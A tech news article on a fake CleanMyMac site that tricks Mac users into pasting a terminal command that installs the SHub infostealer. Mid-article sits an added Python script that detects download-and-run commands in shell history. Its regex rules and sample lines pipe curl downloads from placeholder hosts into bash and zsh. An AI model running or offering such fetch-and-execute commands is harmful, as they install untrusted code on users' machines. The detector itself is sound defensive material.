'macOS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional': Experts warn 'convincing' fake CleanMyMac installs target Apple users to empty crypto wallets

  • Fake CleanMyMac utility spreads SHub infostealer
  • Attack tricks users into pasting terminal commands
  • Malware steals credentials, crypto, and persists via backdoor

A fake utility program for macOS is tricking users into installing infostealer malware that exfiltrates passwords, sensitive files, and even money, experts have warned.

Security researchers at Malwarebytes said the program was part of a wider, highly sophisticated campaign which also included a custom website, reputable brand spoofing, a loader, and the good old ClickFix approach.

The researchers said the campaign spoofed CleanMyMac, a legitimate Mac optimization program built by MacPaw, creating an almost identical website on the cleanmymacos[DOT]org domain, which makes it easy for people to mistake it for the real one. However, instead of simply downloading and running an installer, the victims are asked to open a terminal and paste a command that fetches the payload from a third-party server.
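
A defender-side check for the paste-and-run pattern described above, as an added example that is not from Malwarebytes or the original article: it scans zsh history lines for commands that fetch remote content and hand it straight to an interpreter, then reports the hosts that are not on an allowlist. The history lines, host names and the `TRUSTED_HOSTS` allowlist are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts your organisation accepts for paste-and-run installers.
TRUSTED_HOSTS = {"pkg.corp.example"}

FETCH = r"(?:curl|wget)\b[^|;]*"          # a download command and its arguments
INTERP = r"(?:(?:ba|z|da)?sh\b|osascript\b)"  # interpreters that execute what they read
RULES = {
    # curl ... | bash
    "fetch_piped_to_interpreter": re.compile(
        rf"{FETCH}\|\s*(?:sudo\s+)?{INTERP}"),
    # bash -c "$(curl ...)"  (also the backtick form)
    "fetch_in_command_substitution": re.compile(
        rf"{INTERP}[^|;]*(?:\$\(|`)\s*{FETCH}"),
}
URL = re.compile(r"https?://[^\s\"')|]+")

def scan(lines):
    """Return (line_no, rule, untrusted_hosts) for commands that fetch and run remote code."""
    findings = []
    for no, line in enumerate(lines, 1):
        # Drop the zsh extended-history prefix ": <start>:<elapsed>;" if present.
        cmd = re.sub(r"^: \d+:\d+;", "", line.strip())
        rule = next((name for name, rx in RULES.items() if rx.search(cmd)), None)
        if rule is None:
            continue  # plain downloads and unrelated commands are not reported
        hosts = {urlparse(u).hostname for u in URL.findall(cmd)}
        untrusted = sorted(h for h in hosts if h and h not in TRUSTED_HOSTS)
        if untrusted:
            findings.append((no, rule, untrusted))
    return findings

# Constructed sample of ~/.zsh_history content (not taken from the campaign).
SAMPLE_HISTORY = [
    ": 1700000001:0;brew install jq",
    ": 1700000002:0;curl -fsSL https://downloads.example.net/setup.sh | bash",
    ": 1700000003:0;curl -O https://downloads.example.net/manual.pdf",
    ': 1700000004:0;/bin/zsh -c "$(curl -fsSL https://cdn.example.org/i)"',
    ": 1700000005:0;curl -fsSL https://pkg.corp.example/bootstrap.sh | sh",
]

if __name__ == "__main__":
    for no, rule, hosts in scan(SAMPLE_HISTORY):
        print(f"line {no}: {rule} -> {', '.join(hosts)}")
```

The same two patterns can be applied to process command lines from endpoint telemetry instead of history files, since history is only written when the shell session records it.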

Copyright of this story solely belongs to techradar.com.